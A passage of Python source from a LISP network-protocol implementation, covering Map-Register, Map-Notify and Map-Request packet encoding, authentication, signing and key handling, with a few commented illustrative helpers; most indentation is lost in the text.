if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
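#
# Example only: in the Map-Register first long, the e-bit lives at 0x2000
# and the 3-bit encryption key-id sits directly above it, as encode() and
# decode() in the class above show. Illustrative helper, not used by the
# implementation:
#
def lisp_example_map_register_encryption_key_id(first_long):
    if ((first_long & 0x2000) == 0): return(None)
    return((first_long >> 14) & 0x7)
#enddef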
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
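#
# Illustrative sketch, not called by the implementation: Map-Notify
# authentication is computed over the message with the auth field zeroed
# and then written back in place, as encode() above shows. Assuming the
# zeroed packet returned by decode() and the site's shared password,
# verification amounts to recomputing the hash and comparing:
#
def lisp_example_verify_map_notify_auth(zeroed_packet, alg_id, auth_data,
    password):
    hashval = lisp_hash_me(zeroed_packet, alg_id, password, False)
    return(hashval == auth_data)
#enddef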
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
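#
# Lab-only sketch of the signing flow described above, not part of the
# implementation: the python ecdsa library can generate a throwaway
# keypair, sign the nonce+source-eid+target-eid string, and verify it.
# The key type/curve defaults below are assumptions for illustration;
# deployed keys come from the openssl commands shown above.
#
def lisp_example_sign_and_verify(sig_data):
    privkey = ecdsa.SigningKey.generate()
    pubkey = privkey.get_verifying_key()
    signature = privkey.sign(sig_data)
    try:
        return(pubkey.verify(signature, sig_data))
    except:
        return(False)
    #endtry
#enddef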
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If telemetry data in the JSON, do not need to convert to dict array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
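        #
        # Worked example (illustrative): first_long = 0x10400102 decodes to
        # the SMR-invoked bit set (0x00400000), an itr-rloc-count of 1 (so
        # two ITR-RLOC entries follow), and a record-count of 2. The high-
        # order nibble carries the LISP message type (1 = Map-Request).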
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
            packet = self.target_eid.unpack_address(packet)
            if (packet == None): return(None)
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
